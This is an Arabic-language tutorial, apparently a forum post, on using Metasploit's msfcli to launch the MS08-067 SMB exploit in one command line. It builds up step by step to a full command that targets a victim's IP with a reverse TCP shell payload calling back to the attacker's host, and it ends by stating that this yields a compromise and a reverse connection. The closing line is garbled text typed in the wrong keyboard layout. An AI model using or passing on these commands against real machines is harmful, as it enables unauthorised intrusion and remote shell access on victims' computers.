السلام عليكم ورحمة الله وبركاته
في هذا الدرس رح احكي عن كيفية استخدام msfcli ,, بدون صور ..
أولا نستعملها من سطر الأوامر ,( أذكر انني تحت بيئة لينوكس توزيعة باك تراك 4 )...
وهي محبوبة لأنها أولا سهلة ومختصرة للأوامر في سطر واحد .. لأنك تختار الثغرة والبايلود وتعدل المتطلبات من أيبيهات وبورت في نفس السطر ثم تضيف باراميتر وتكبس انتر وتشتغل الثغرة ,, بدل ما تدخل على الكونسول او الواجهة الرسومية وتعدل ...
ويأتي معها باراميترز ..
اولا ندخل لمكان وجود الميتا وهو /penet/exploits/framework3
ونكتب
ونشوف شو بتقدم من خيارات و ثغرات وبايلودات
ثم نكتب بعدها اسم الثغرة , وبعد اسم الثغرة ونحط الباراميترز من أجل نشوف شو محتاجه الثغرة
مثال
كود:
./msfcli windows/smb/ms08_067_netapi O
كتبنا الباراميتر أوو ( O ) وهو من أجل نشوف option للثغرة, ونقدر نكتب غيره مثل S وهي متل ملخص للمعلومات حول الثغرة, جربوهن كلهن حتى تصير سهل الإستعمال والتعامل
وفينا نشوف الخيارات الأخرى ...
فهذه الثغرة تحتاج أيبي الضحية .. لذلك يجب ان نحدد الــ RHOST فنكتب بعد الثغرة RHOST وأيبي الضحية لتصبح بهذ
الشكل
كود:
./msfcli windows/smb/ms08_067_netapi RHOST=IPvictim
الأن جاء دور البايلود .. أذكر أن msfcli هي كل شيئ على سطر واحد
نكتب البايلود اللي نريدها بعد الأيبي ..وكذلك بعد البايلود أوو )O(
حتى نشوف الأوبشن للبايلودوالثغرةكلها ..
كود:
./msfcli windows/smb/ms08_067_netapi RHOST=IPvictim Payload=windows/shell/reverse_tcp O
هذه البايلود تحتاج الأيبي الشخصي .. لذلك نكتب LHOST OURip
والمنفذ افتراضي 4444 ما داعي نغيره .. ( يمكن التنصت عبر النت كات .. انشالله الشرح في دروس قادمة )
بعد ما نكتب كل شيئ نكتب E حتى تتنفذ الثغرة وكل الأوامر على سطر واحد
كود:
./msfcli windows/smb/ms08_067_netapi RHOST=IPvictim Payload=windows/shell/reverse_tcp LHOST=ourIP E
ومنحصل على اختراق وتنفيذ اتصال عكسي .. (يمكن تغيير إلى بايلود أخرى مع مراعاة التطلبات)
--------======--------
هكذا نكون شفنا كيف نستخدمها .. وخير الكلام ما قل ودل . . . وأذكر انه يوجد خيارات كثيرة أيضا تختلف مع اختلاف الثغرة و البايلود .. يجب عليك ان تكثر من الإستخدام حتى يسهل الإستعمال ..
هذا واللـه الموفق
avp H]hm hgJ msfcli ]hog hgldjhsfg,dj u,qh uk hg;,ks,g ,hg,h[im hgvs,ldm